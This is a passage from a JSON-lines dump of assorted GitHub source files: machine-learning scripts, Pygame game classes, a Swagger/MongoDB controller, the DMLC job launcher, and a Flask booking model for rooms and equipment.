df['VG'].columns])\n\n df2=pd.DataFrame(data=dgm, columns=header)\n df=pd.concat((df, df2), axis=1)\n\n df.to_csv(path, index=False, float_format='%.6e')\nelse:\n dgm=getpd(df, 'dgm')\n\ndf.to_csv(path, index=False, float_format='%+.6e')\nVGfit=VG[np.argmax(gm)-2:np.argmax(gm)+3]\nIDfit=ID[np.argmax(gm)-2:np.argmax(gm)+3]\n\nm, b= np.polyfit(VGfit, IDfit, 1)\nVth=-b/m\nfitID=m*VG[:np.argmax(gm)]+b\n\nPlot(path, 'VG', ['ID', 'gm']) \n\nplt.show()\n","repo_name":"lszucchi/HPIB","sub_path":"Aux scripts/testplot.py","file_name":"testplot.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35346652502","text":"# coding=utf-8\nr\"\"\"Transformes a phrase-based OSM sequence to a token-based OSM sequence, keeps phrases together.\"\"\"\n\nimport argparse\nimport sys\n\nparser = argparse.ArgumentParser(description='PBOSM -> OSM conversion.')\nargs = parser.parse_args()\n\nSRC_POP1 = \"4\"\nSRC_POP2 = \"8\"\n\nfor pbosm in sys.stdin:\n pbosm = pbosm.strip().split()\n osm = []\n pop2_cnt = 0\n for op in pbosm:\n if op == SRC_POP2:\n pop2_cnt += 1\n elif op == SRC_POP1:\n osm.extend([SRC_POP1] * (pop2_cnt + 1))\n pop2_cnt = 0\n else:\n osm.append(op)\n osm.extend([SRC_POP1] * pop2_cnt)\n print(\" \".join(osm))\n\n","repo_name":"fstahlberg/ucam-scripts","sub_path":"t2t/pbosm2osm.py","file_name":"pbosm2osm.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"3394856778","text":"import os\nimport logging\nimport pickle\nimport tensorflow as tf\nfrom tensorflow.keras import layers, models\nfrom tensorflow.keras.utils import to_categorical\nimport numpy as np\ntf.keras.utils.set_random_seed(42)\n\nWEIGHTS_FOLDER = 'weights/'\nWEIGHTS_FILE_SUFFIX = '_weights.pickle'\nDATA_FOLDER = 'data/'\nDATA_FILE_SUFFIX = '_data.npz'\nTEST_PATH = 'data/test_data.npz'\nEPOCHS = 1\n\ndef _get_model():\n '''\n model = models.Sequential()\n model.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(32, 32, 3)))\n model.add(layers.MaxPooling2D((2, 2)))\n model.add(layers.Conv2D(64, (3, 3), activation='relu'))\n model.add(layers.MaxPooling2D((2, 2)))\n model.add(layers.Conv2D(64, (3, 3), activation='relu'))\n model.add(layers.Dropout(0.2))\n model.add(layers.Flatten())\n model.add(layers.Dense(64, activation='relu'))\n model.add(layers.Dropout(0.2))\n model.add(layers.Dense(10, activation='softmax'))\n '''\n model = models.Sequential()\n\n model.add(layers.Conv2D(32, (3,3), padding='same', activation='relu', input_shape=(32,32,3)))\n model.add(layers.BatchNormalization())\n model.add(layers.Conv2D(32, (3,3), padding='same', activation='relu'))\n model.add(layers.BatchNormalization())\n model.add(layers.MaxPooling2D(pool_size=(2,2)))\n model.add(layers.Dropout(0.3))\n\n model.add(layers.Conv2D(64, (3,3), padding='same', activation='relu'))\n model.add(layers.BatchNormalization())\n model.add(layers.Conv2D(64, (3,3), padding='same', activation='relu'))\n model.add(layers.BatchNormalization())\n model.add(layers.MaxPooling2D(pool_size=(2,2)))\n model.add(layers.Dropout(0.5))\n\n model.add(layers.Flatten())\n model.add(layers.Dense(64, activation='relu'))\n model.add(layers.BatchNormalization())\n model.add(layers.Dropout(0.5))\n model.add(layers.Dense(10, activation='softmax'))\n return model\n\ndef _encode_weights(weights):\n weights_bytes = pickle.dumps(weights)\n raw_weights = ''\n for byte in weights_bytes:\n 
raw_weights += str(byte) + ','\n return raw_weights[:-1]\n\ndef _decode_weights(raw_weights):\n byte_list = []\n for byte_str in raw_weights.split(','):\n byte_list.append(int(byte_str))\n weights_bytes = bytes(byte_list)\n return pickle.loads(weights_bytes)\n\ndef _save_weights(weights_path, weights):\n with open(weights_path, 'wb') as weights_file:\n pickle.dump(weights, weights_file)\n\ndef _read_weights(weights_path):\n weights = None\n if os.path.exists(weights_path):\n with open(weights_path, 'rb') as weights_file:\n weights = pickle.load(weights_file)\n else:\n weights = _get_model().get_weights()\n _save_weights(weights_path, weights)\n return weights\n\ndef get_weights(car_id):\n weights_path = WEIGHTS_FOLDER + car_id + WEIGHTS_FILE_SUFFIX\n weights = _read_weights(weights_path)\n return _encode_weights(weights)\n\ndef train(car_id, training_round):\n train_path = DATA_FOLDER + car_id + DATA_FILE_SUFFIX\n train_data = np.load(train_path)\n test_data = np.load(TEST_PATH)\n\n train_images, train_labels = train_data['images'], train_data['labels']\n test_images, test_labels = test_data['images'], test_data['labels']\n\n weights_path = WEIGHTS_FOLDER + car_id + WEIGHTS_FILE_SUFFIX\n weights = _read_weights(weights_path)\n\n model = _get_model()\n model.set_weights(weights)\n\n model.compile(optimizer='adam',\n loss=tf.keras.losses.categorical_crossentropy, metrics=['accuracy'])\n history = model.fit(train_images, train_labels, epochs=EPOCHS,\n validation_data=(test_images, test_labels), verbose=0)\n logging.warning('Node {}, Training Round {}, History {}'.format(car_id, training_round, history.history))\n\n _save_weights(weights_path, model.get_weights())\n\ndef merge(raw_weights, car_id):\n weights_path = WEIGHTS_FOLDER + car_id + WEIGHTS_FILE_SUFFIX\n weights = _read_weights(weights_path)\n\n received_weights = _decode_weights(raw_weights)\n\n for i in range(len(weights)):\n weights[i] = (weights[i] + received_weights[i]) / 2\n\n _save_weights(weights_path, weights)\n","repo_name":"Luizfrf3/veins-5.2","sub_path":"examples/veins/simplenet.py","file_name":"simplenet.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"14832747476","text":"import subprocess\nfrom six import iteritems\nimport typing\n\n\ndef run_nastran(fname, nastran_cmd='nastran', keywords=None, run=True):\n # type: (str, str, Optional[Union[Dict[str, str], List[str]]], bool) -> Tuple[Optional[int], List[str]]\n \"\"\"\n Call a nastran subprocess with the given filename\n\n Parameters\n -----------\n fname : string\n Filename of the Nastran .bdf file\n keywords : dict/list of strings, optional\n Default keywords are `'scr=yes'`, `'bat=no'`, `'old=no'`, and `'news=no'`\n\n Returns\n -------\n return_code : int\n the nastran flag\n cmd_args : List[str]\n the nastran commands that go into subprocess\n \"\"\"\n if keywords is None:\n keywords_list = ['scr=yes', 'bat=no', 'old=no','news=no'] # 'mem=1024mb',\n else:\n if isinstance(keywords, (list, tuple)):\n keywords_list = keywords\n else:\n keywords_list = []\n for keyword, value in iteritems(keywords):\n if value is None:\n continue\n keywords_list.append('%s=%s' % (keyword, value))\n\n call_args = [nastran_cmd, fname] + keywords_list\n return_code = None\n if run:\n return_code = subprocess.call(call_args)\n return return_code, 
call_args\n\n","repo_name":"mtnakayama/pyNastran","sub_path":"pyNastran/utils/nastran_utils.py","file_name":"nastran_utils.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"13258260886","text":"import pandas as pd\nimport numpy as np\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler, Normalizer\nfrom neupy import algorithms, estimators, environment, layers, architectures\nfrom sklearn import metrics\nfrom sklearn.model_selection import cross_validate\nfrom sklearn.model_selection import cross_val_predict\n\ndf = pd.read_csv(\"OnlineNewsPopularity.csv\")\n\nheaders = df.columns[0:61]\n\n\n#remove recent news (less than 2 months)\ndf = df[df[' timedelta'] > 60]\n\n#Conduct PCA\n\n\ndata=df[df.columns[2:60]]\n\n\ntarget = df[' shares'].ravel()\n\ndata_norm = StandardScaler().fit_transform(data)\n\n\n\n\n\nnetwork = architectures.mixture_of_experts([\n layers.join(\n layers.Input(58),\n layers.Softmax(22),\n layers.Softmax(1),\n ),\n layers.join(\n layers.Input(58),\n layers.Relu(60),\n layers.Relu(40),\n layers.Softmax(22),\n layers.Softmax(1),\n ),\n layers.join(\n layers.Input(58),\n layers.Tanh(12),\n layers.Tanh(25),\n layers.Tanh(1),\n ),\n])\nnetwork\ngdnet = algorithms.Adam(network, verbose=True)\ngdnet.fit(data_norm,target, epochs=500)\n\npredicted = cross_val_predict(gdnet, data_norm, target, cv=5)\n\n\n\nerror = estimators.rmse(target, predicted)\n\nprint(\"MOE RMSE = {}\\n\".format(error))\n\nr2_score = metrics.r2_score(target, predicted)\n\nprint(\"MOE R_SCORE = {}\\n\".format(r2_score))\n\n\n","repo_name":"yupm/KE5206","sub_path":"cross_val_en.py","file_name":"cross_val_en.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2573583513","text":"from src.config import *\n\n\n# The base class of all objects.\nclass Element:\n\n def __init__(self, x=5, y=5, width=Sys.BLO_WID, height=Sys.BLO_WID, is_activated=True):\n self.x = x # Its top-left corner.\n self.y = y\n self.width = width\n self.height = height\n self.index = -32768\n self.collider = pygame.Rect(self.x, self.y, self.width, self.height)\n self.is_activated = is_activated # True iff the mouse has clicked on it.\n self.is_suspended = False # True iff the mouse is suspending on it.\n self.is_switched = False # True iff it is on used.\n self.is_held_left = False # True iff the left mouse is downing on it.\n self.is_released_left = False # True iff the left mouse releases it.\n self.is_held_right = False # True iff the right mouse is downing on it.\n self.is_released_right = False # True iff the right mouse releases it.\n self.TEXT = None\n # print(str(self.index), \"has been created.\")\n\n def update(self):\n if self.is_activated:\n self.display()\n self.switch_handler()\n self.is_suspended = self.mouse_handler(Sys.mouse_current)\n self.is_held_left = self.mouse_handler(Sys.left_down)\n self.is_released_left = self.mouse_handler(Sys.left_release)\n self.is_held_right = self.mouse_handler(Sys.right_down)\n self.is_released_right = self.mouse_handler(Sys.right_release)\n\n def mouse_handler(self, condition: list) -> int: # -> bool\n # return self.x < condition_list[0] < self.x + self.width and self.y < condition_list[1] < self.y + self.height\n return self.collider.collidepoint(condition)\n\n def switch_handler(self):\n if self.is_held_left and self.is_released_left:\n 
self.is_switched = not self.is_switched\n\n def display(self):\n pygame.draw.rect(Sys.main_screen, Color.DDDGREY, self.collider, 0)\n\n def block_skin(self):\n if not self.is_switched:\n if self.is_suspended:\n pygame.draw.rect(Sys.main_screen, Color.LDDDGREY, (self.x + 3, self.y + 1, self.width - 4, self.height - 2), 0)\n pygame.draw.rect(Sys.main_screen, Color.DGREY, (self.x + 1, self.y + 1, self.width - 4, self.height - 4), 0)\n pygame.draw.rect(Sys.main_screen, Color.LDDGREY, (self.x + 3, self.y + 3, self.width - 6, self.height - 6), 0)\n else:\n pygame.draw.rect(Sys.main_screen, Color.DDGREY, (self.x + 3, self.y + 1, self.width - 4, self.height - 2), 0)\n pygame.draw.rect(Sys.main_screen, Color.GREY, (self.x + 1, self.y + 1, self.width - 4, self.height - 4), 0)\n pygame.draw.rect(Sys.main_screen, Color.DGREY, (self.x + 3, self.y + 3, self.width - 6, self.height - 6), 0)\n else:\n pygame.draw.rect(Sys.main_screen, Color.GREY, (self.x + 1, self.y + 1, self.width - 2, self.height - 2), 0)\n","repo_name":"LuzeBillan/MineSweeper","sub_path":"src/element.py","file_name":"element.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1508367723","text":"import pygame\nfrom settings import *\nfrom abstractSprites import Object\nfrom animationSprites import CoinAnimation\n\n\nclass PipeTop(Object):\n def __init__(self, game, x, y, name=\"platform\"):\n groups = [game.all_sprites, game.walls]\n super().__init__(game, x, y, groups, pipe_top_path, name)\n \nclass PipeMiddle(Object):\n def __init__(self, game, x, y, name=\"pipe_top\"):\n groups = [game.all_sprites, game.walls]\n super().__init__(game, x, y, groups, pipe_middle_path, name)\n \nclass Ground(Object):\n def __init__(self, game, x, y, name=\"pipe_middle\"):\n groups = [game.all_sprites, game.walls]\n super().__init__(game, x, y, groups, floor_path, name)\n\nclass Brick(Object):\n def __init__(self, game, x, y, name=\"platform\"):\n groups = [game.all_sprites, game.walls]\n super().__init__(game, x, y, groups, brick_path, name)\n self.hit = False\n self.animation_count = 0\n self.time = 16\n self.speed = 1\n self.y = y\n def update(self):\n self.rect.y+=3\n \n if self.rect.colliderect(self.game.player.rect) and (self.game.player.jumped == True):\n self.hit = True\n\n if self.hit:\n self.game.bump_audio.play()\n if self.animation_count <= self.time/2:\n self.rect.y -= self.speed\n elif self.animation_count > self.time/2:\n self.rect.y += self.speed\n \n if self.animation_count == self.time:\n self.animation_count = 0\n self.hit = False\n self.y_vel = 0 \n self.rect.y = self.y + 3 \n self.animation_count += 1\n \n self.rect.y-=3\n \n\nclass Stair(Object):\n def __init__(self, game, x, y, name=\"stair_block\"):\n groups = [game.all_sprites, game.walls]\n super().__init__(game, x, y, groups, stair_block_path, name)\n \nclass Flag(Object):\n def __init__(self, game, x, y, name=\"flag\"):\n groups = [game.all_sprites]\n super().__init__(game, x, y, groups, flag_path, name)\n self.rect.y -= self.image.get_height()-BLOCK_SIZE\n\n \n\n\nclass MysteryBox(Object):\n ANIMATION_DELAY = 15\n \n def __init__(self, game, x, y, name=\"Mystery Box\"):\n groups = [game.all_sprites, game.walls, game.mystery_boxes]\n super().__init__(game, x, y, groups, question_mark_block_path, name)\n self.gotten = False\n self.gotten_image = pygame.image.load(question_mark_block_gotten_path).convert_alpha()\n self.gotten_image = 
pygame.transform.scale2x(self.gotten_image)\n \n self.question_mark_block = pygame.image.load(question_mark_block_path).convert_alpha()\n self.question_mark_block = pygame.transform.scale2x(self.question_mark_block)\n \n self.question_mark_block_2 = pygame.image.load(question_mark_block_2_path).convert_alpha()\n self.question_mark_block_2 = pygame.transform.scale2x(self.question_mark_block_2)\n \n self.question_mark_block_3 = pygame.image.load(question_mark_block_3_path).convert_alpha()\n self.question_mark_block_3 = pygame.transform.scale2x(self.question_mark_block_3)\n \n \n self.sprites = [self.question_mark_block,\n self.question_mark_block_2,\n self.question_mark_block_3]\n \n self.animation_count = 0\n self.bounce = False\n self.y = y\n def update(self):\n self.rect.y+=3\n if self.gotten == False:\n \n sprite_index = (self.animation_count // self.ANIMATION_DELAY) % len(self.sprites)\n self.image = self.sprites[sprite_index]\n if self.animation_count >= self.ANIMATION_DELAY * len(self.sprites)*5:\n self.animation_count = 0\n self.animation_count += 1\n if self.rect.colliderect(self.game.player.rect) and (self.game.player.jumped == True):\n CoinAnimation(self.game, self.rect.x,self.rect.y)\n self.game.coin_audio.play()\n self.game.coin_count += 1\n self.game.score += 200\n self.gotten = True\n self.bounce = True\n self.speed = 2\n self.image = self.gotten_image\n self.animation_count = 0\n else:\n if self.rect.colliderect(self.game.player.rect) and (self.game.player.jumped == True):\n self.game.bump_audio.play()\n \n if self.bounce:\n if self.animation_count <= 4:\n self.rect.y -= self.speed\n elif self.animation_count > 4:\n self.rect.y += self.speed\n \n if self.animation_count == 8:\n self.bounce = False\n self.animation_count = 0\n self.rect.y = self.y + 3 \n self.animation_count += 1 \n\n self.rect.y-=3\n \n \n\n ","repo_name":"eliyahumasinter/Mario","sub_path":"blockSprites.py","file_name":"blockSprites.py","file_ext":"py","file_size_in_byte":5017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70885006242","text":"import connexion\nimport six\nfrom pymongo import MongoClient\nfrom flask import jsonify\n\nfrom swagger_server.models.successfull3 import Successfull3 # noqa: E501\nfrom swagger_server import util\n\ndef existing_metadata(post_data):\n new_data = {}\n load_data_time = post_data.get('load_data_time', None)\n if load_data_time:\n new_data['load_data_time'] = load_data_time\n file_size = post_data.get('file_size', None)\n if file_size:\n new_data['file_size'] = file_size\n\n file_size_pixels = post_data.get('file_size_pixels', None)\n if file_size_pixels:\n new_data['file_size_pixels'] = file_size_pixels\n\n geolocation = post_data.get('geolocation', None)\n if geolocation:\n new_data['geolocation'] = geolocation\n\n user_id = post_data.get('user_id', None)\n if user_id:\n new_data['user_id'] = user_id\n\n file_format = post_data.get('file_format', None)\n if file_format:\n new_data['file_format'] = file_format\n return new_data\n\ndef get_metadata_post(post_id): # noqa: E501\n \"\"\"Get metadata post\n\n API to get the metadata of the post # noqa: E501\n\n :param post_id: Post id\n :type post_id: str\n\n :rtype: Successfull3\n \"\"\"\n client = MongoClient('localhost', 27017)\n db = client.database\n posts = db.posts\n post_data = posts.find_one({'post_id': int(post_id)})\n if post_data:\n post_data = existing_metadata(post_data)\n post_data['result'] = True\n del posts\n del db\n del client\n return 
jsonify(post_data), 201\n del posts\n del db\n del client\n return jsonify({'result': False}), 501\n\n\n\n\n\n\n\n","repo_name":"ASurtaev/SummerSberPractice","sub_path":"swagger_server/controllers/get_metadata_post_controller.py","file_name":"get_metadata_post_controller.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"}
+{"seq_id":"71586343841","text":"#!/usr/bin/env python3\n# pylint: disable=invalid-name\n\"\"\"The container launcher script that launches DMLC with the right env variable.\"\"\"\nfrom __future__ import absolute_import\n\nimport glob\nimport sys\nimport os\nimport subprocess\nfrom .util import py_str\n\ndef unzip_archives(ar_list, env):\n for fname in ar_list:\n if not os.path.exists(fname):\n continue\n if fname.endswith('.zip'):\n subprocess.call(args=['unzip', fname], env=env)\n elif fname.find('.tar') != -1:\n subprocess.call(args=['tar', '-xf', fname], env=env)\n\ndef main():\n \"\"\"Main module of the launcher.\"\"\"\n if len(sys.argv) < 2:\n print('Usage: launcher.py your command')\n sys.exit(0)\n\n hadoop_home = os.getenv('HADOOP_HOME')\n hdfs_home = os.getenv('HADOOP_HDFS_HOME')\n java_home = os.getenv('JAVA_HOME')\n hadoop_home = os.getenv('HADOOP_PREFIX') if hadoop_home is None else hadoop_home\n cluster = os.getenv('DMLC_JOB_CLUSTER')\n\n assert cluster is not None, 'need to have DMLC_JOB_CLUSTER'\n\n env = os.environ.copy()\n library_path = ['./']\n class_path = []\n\n if cluster == 'yarn':\n assert hadoop_home is not None, 'need to set HADOOP_HOME'\n assert hdfs_home is not None, 'need to set HADOOP_HDFS_HOME'\n assert java_home is not None, 'need to set JAVA_HOME'\n\n if cluster == 'sge':\n num_worker = int(env['DMLC_NUM_WORKER'])\n task_id = int(env['DMLC_TASK_ID'])\n if task_id < num_worker:\n env['DMLC_ROLE'] = 'worker'\n else:\n env['DMLC_ROLE'] = 'server'\n\n if hadoop_home:\n library_path.append('%s/lib/native' % hdfs_home)\n library_path.append('%s/lib' % hdfs_home)\n (classpath, _) = subprocess.Popen('%s/bin/hadoop classpath' % hadoop_home,\n stdout=subprocess.PIPE, shell=True,\n env=os.environ).communicate()\n classpath = py_str(classpath)\n for f in classpath.split(':'):\n class_path += glob.glob(f)\n\n if java_home:\n library_path.append('%s/jre/lib/amd64/server' % java_home)\n\n env['CLASSPATH'] = '${CLASSPATH}:' + (':'.join(class_path))\n\n # setup hdfs options\n if 'DMLC_HDFS_OPTS' in env:\n env['LIBHDFS_OPTS'] = env['DMLC_HDFS_OPTS']\n elif 'LIBHDFS_OPTS' not in env:\n env['LIBHDFS_OPTS'] = '--Xmx128m'\n\n LD_LIBRARY_PATH = env['LD_LIBRARY_PATH'] if 'LD_LIBRARY_PATH' in env else ''\n env['LD_LIBRARY_PATH'] = LD_LIBRARY_PATH + ':' + ':'.join(library_path)\n\n # unzip the archives.\n if 'DMLC_JOB_ARCHIVES' in env:\n unzip_archives(env['DMLC_JOB_ARCHIVES'].split(':'), env)\n\n ret = subprocess.call(args=sys.argv[1:], env=env)\n sys.exit(ret)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dmlc/dmlc-core","sub_path":"tracker/dmlc_tracker/launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","stars":854,"dataset":"github-code","pt":"54"}
+{"seq_id":"8091900624","text":"from datetime import datetime\n\nfrom flask_login import current_user\n\nfrom app import db, fuso_horario\nfrom app.models.status import Status\n\n# Classe para as solicitações de equipamentos e salas\nclass Solicitacao(db.Model):\n __tablename__ = 'solicitacoes'\n __table_args__ = {'extend_existing': 
True}\n \n id = db.Column(db.Integer, primary_key=True)\n status = db.Column(db.Enum(Status), default=Status.ABERTO.name)\n data_abertura = db.Column(db.DateTime, nullable=False, \n default=datetime.now().astimezone(fuso_horario))\n data_inicio_pref = db.Column(db.Date, nullable=False)\n data_fim_pref = db.Column(db.Date, nullable=False)\n data_retirada = db.Column(db.DateTime, nullable=True)\n data_devolucao = db.Column(db.DateTime, nullable=True)\n data_cancelamento = db.Column(db.DateTime, nullable=True)\n data_finalizacao = db.Column(db.DateTime, nullable=True)\n quantidade = db.Column(db.Integer, nullable=False, default=0)\n descricao = db.Column(db.String(20), nullable=False)\n tipo = db.Column(db.String(20), nullable=False)\n ativo = db.Column(db.Boolean, nullable=False, default=True)\n\n # Uma solicitação está associada a um usuário e um turno\n usuario_id = db.Column(db.Integer, db.ForeignKey('usuarios.id'), \n nullable=False)\n turno_id = db.Column(db.Integer, db.ForeignKey('turnos.id'), \n nullable=False)\n \n turno = db.relationship('Turno', back_populates='solicitacoes')\n\n __mapper_args__ = {\n 'polymorphic_identity': 'SOLICITACAO',\n 'polymorphic_on': tipo\n }\n \n def __repr__(self):\n return f\"Solicitação #{self.id} - {self.tipo} - {self.status.value}\"\n \n # Recupera todas as solicitações presentes no banco de dados\n def recuperar_tudo():\n return Solicitacao.query.filter_by(ativo=True).all()\n \n # Recupera todas as solicitações de um autor\n def recuperar_tudo_usuario(usuario):\n return Solicitacao.query.filter_by(autor=usuario).filter_by(ativo=True).all()\n \n # Recupera a solicitação pela ID e retorna erro 404 caso contrário\n def recuperar_id(sol_id):\n return Solicitacao.query.filter_by(id=sol_id).filter_by(ativo=True).first_or_404()\n \n # Recupera todas as solicitações em aberto no banco de dados\n def recuperar_aberto():\n return Solicitacao.query.filter_by(status='ABERTO').filter_by(ativo=True).all()\n \n # Recupera todas as solicitações em uso no banco de dados\n def recuperar_em_uso():\n return Solicitacao.query.filter_by(status='EMUSO').filter_by(ativo=True).all()\n \n # Recupera todas as solicitações pendentes de um usuário\n def recuperar_pendente_autor(usuario):\n return Solicitacao.query.filter_by(status='PENDENTE').filter_by(\n autor=usuario).filter_by(ativo=True).all()\n \n # Recupera as últimas solicitações de um usuário específico\n def recuperar_ultimas_autor(usuario, limite):\n return Solicitacao.query.filter_by(autor=usuario).filter_by(\n ativo=True).order_by(Solicitacao.id.desc()).limit(limite)\n \n # Recupera as últimas solicitações de um equipamento específico\n def recuperar_ultimas_eqp(equipamento, limite):\n return SolicitacaoEquipamento.query.filter(\n SolicitacaoEquipamento.equipamentos.contains(equipamento)).filter_by(\n ativo=True).order_by(SolicitacaoEquipamento.id.desc()).limit(limite)\n \n # Recupera as últimas solicitações de um usuário específico\n def recuperar_ultimas_sala(sala, limite):\n return SolicitacaoSala.query.filter(\n SolicitacaoSala.salas.contains(sala)).filter_by(\n ativo=True).order_by(SolicitacaoSala.id.desc()).limit(limite)\n \n # Retorna o tempo restante para a solicitação entrar em atraso\n def tempo_restante(self):\n if(self.data_devolucao and self.status.name == 'EMUSO'):\n agora = datetime.now().astimezone(fuso_horario)\n tempo_restante = int(datetime.timestamp(self.data_devolucao) - \n datetime.timestamp(agora))\n if tempo_restante <= 0:\n return None\n minutos, segundos = divmod(tempo_restante, 60)\n 
horas, minutos = divmod(minutos, 60)\n dias, horas = divmod(horas, 24)\n return \"%01dd, %01dh, %01dmin\" % (dias, horas, minutos)\n else:\n return None\n\n # Verifica se uma solicitação está marcada para o dia atual\n def verificar_inicio_hoje(data_inicio_pref):\n if data_inicio_pref == datetime.now().astimezone(fuso_horario).date():\n return True\n else:\n return False\n\n # Verifica se uma solicitação tem como autor um determinado usuário\n def verificar_autor(self, usuario):\n if self.autor == usuario or usuario.tipo.name == 'ADMIN':\n return True\n else:\n return False\n \n # Verifica se uma solicitação está com o status 'Aberto'\n def verificar_aberto(self):\n if self.status.name == 'ABERTO' or self.status.name == 'SOLICITADO':\n return True\n else:\n return False\n \n # Verifica se uma solicitação está com o status 'Confirmado'\n def verificar_confirmado(self):\n if self.status.name == 'CONFIRMADO':\n return True\n else:\n return False\n \n # Verifica se uma solicitação está com o status 'Em Uso' \n def verificar_em_uso(self):\n if self.status.name == 'EMUSO':\n return True\n else:\n return False\n \n # Verifica se uma solicitação está com o status 'Pendente'\n def verificar_pendente(self):\n if self.status.name == 'PENDENTE':\n return True\n else:\n return False\n \n # Verifica se uma solicitação ultrapassou a data de devolução\n def verificar_atraso(self):\n if (datetime.now().astimezone(fuso_horario) > \n self.data_devolucao.astimezone(fuso_horario)):\n return True\n else:\n return False\n \n # Insere a solicitação no banco de dados\n def inserir(self):\n db.session.add(self)\n db.session.commit()\n return\n \n # Atualiza o status de um solicitação para 'Solicitado'\n def solicitado(self):\n self.status = 'SOLICITADO' \n db.session.commit() \n \n # Atualiza o status de um solicitação para 'Confirmado'\n def confirmar(self):\n self.status = 'CONFIRMADO' \n db.session.commit() \n \n # Atualiza o status de um solicitação para 'Em Uso'\n def entregar(self, lista_itens, form):\n self.status = 'EMUSO'\n self.data_retirada = datetime.now().astimezone(fuso_horario)\n # Combina data de devolução com o horário final do turno\n self.data_devolucao = datetime.combine(form.data_devolucao.data, \n self.turno.hora_fim)\n if self.tipo == 'EQUIPAMENTO':\n self.equipamentos = lista_itens\n for equipamento in self.equipamentos:\n equipamento.status = 'EMUSO'\n if self.tipo == 'SALA':\n self.salas = lista_itens\n for sala in self.salas: \n sala.status = 'EMUSO'\n db.session.commit()\n \n # Atualiza o status de um solicitação para 'Pendente'\n def pendente(self):\n self.status = 'PENDENTE'\n if self.tipo == 'EQUIPAMENTO':\n for equipamento in self.equipamentos:\n equipamento.status = 'PENDENTE'\n if self.tipo == 'SALA':\n for sala in self.salas:\n sala.status = 'PENDENTE' \n db.session.commit()\n \n # Atualiza o status de um solicitação para 'Finalizado' \n def finalizar(self):\n self.status = 'FECHADO'\n self.data_finalizacao = datetime.now().astimezone(fuso_horario)\n if self.tipo == 'EQUIPAMENTO':\n for equipamento in self.equipamentos:\n equipamento.status = 'ABERTO'\n if self.tipo == 'SALA':\n for sala in self.salas:\n sala.status = 'ABERTO'\n db.session.commit()\n \n # Atualiza o status de um solicitação para 'Cancelado' \n def cancelar(self):\n if self.status != 'ABERTO' and self.status != 'SOLICITADO':\n if self.tipo == 'EQUIPAMENTO':\n if self.equipamentos:\n for equipamento in self.equipamentos:\n equipamento.status = 'ABERTO'\n if self.tipo == 'SALA':\n if self.salas:\n for sala in 
self.salas:\n sala.status = 'ABERTO' \n self.status = 'CANCELADO'\n self.data_cancelamento = datetime.now().astimezone(fuso_horario)\n db.session.commit()\n \n # Desativa o registro de uma solicitação no banco de dados\n def excluir(self):\n # Atualiza o status de equipamentos e salas antes de exluir a solicitação\n if self.status.name == 'CONFIRMADO':\n if self.equipamentos:\n for equipamento in self.equipamentos:\n equipamento.status = 'ABERTO'\n if self.salas:\n for sala in self.salas:\n sala.status = 'ABERTO'\n self.status = 'FECHADO'\n self.ativo = False\n db.session.commit()\n \n# Tabela que associa as solicitações às salas\nsolicitacao_s = db.Table('solicitacao_s',\n db.Column('solicitacao_sala_id', db.Integer, db.ForeignKey('solicitacoes_salas.id'), \n primary_key=True),\n db.Column('sala_id', db.Integer, db.ForeignKey('salas.id'), \n primary_key=True)\n)\n\n# Tabela que associam as solicitações aos equipamentos\nsolicitacao_e = db.Table('solicitacao_e',\n db.Column('solicitacao_equipamento_id', db.Integer, db.ForeignKey('solicitacoes_equipamentos.id'), \n primary_key=True),\n db.Column('equipamento_id', db.Integer, db.ForeignKey('equipamentos.id'), \n primary_key=True)\n)\n\n# Classe específica para as solicitações de salas\nclass SolicitacaoSala(Solicitacao):\n __tablename__ = 'solicitacoes_salas'\n \n id = db.Column(db.Integer, db.ForeignKey('solicitacoes.id'), primary_key=True)\n\n setor_id = db.Column(db.Integer, db.ForeignKey('setores.id'), nullable=False)\n \n # Pode estar associada a múltiplas salas de um único setor\n setor = db.relationship('Setor', back_populates='solicitacoes')\n salas = db.relationship('Sala', secondary= solicitacao_s, \n back_populates='solicitacoes')\n \n __mapper_args__ = {\n 'polymorphic_identity': 'SALA',\n }\n \n # Verifica se o usuário já possui uma solicitação não finalizada\n def verificar_existente_usuario(usuario):\n solicitacao = SolicitacaoSala.query.filter_by(autor=usuario).filter_by(\n ativo=True).order_by(SolicitacaoSala.id.desc()).first()\n if solicitacao:\n if (solicitacao.status.name != 'CANCELADO' and \n solicitacao.status.name != 'FECHADO'):\n return True\n return False\n \n # Cria uma nova solitação de equipamento para ser inserida\n def criar(status, form):\n return SolicitacaoSala(turno_id=form.turno.data,\n usuario_id=current_user.id,\n descricao=form.descricao.data,\n quantidade=form.qtd_preferencia.data,\n setor_id=form.setor.data,\n data_inicio_pref=form.data_inicio_pref.data,\n data_fim_pref=form.data_fim_pref.data,\n status=status)\n \n def inserir(self):\n return super().inserir()\n \n\n# Classe específica para as solicitações de equipamentos\nclass SolicitacaoEquipamento(Solicitacao):\n __tablename__ = 'solicitacoes_equipamentos'\n \n id = db.Column(db.Integer, db.ForeignKey('solicitacoes.id'), primary_key=True)\n\n tipo_eqp_id = db.Column(db.Integer, db.ForeignKey('tipos_equipamento.id'), \n nullable=True)\n \n # Pode estar associada a múltiplos equipamentos de um único tipo\n equipamentos = db.relationship('Equipamento', secondary=solicitacao_e, \n back_populates='solicitacoes')\n tipo_eqp = db.relationship('TipoEquipamento', 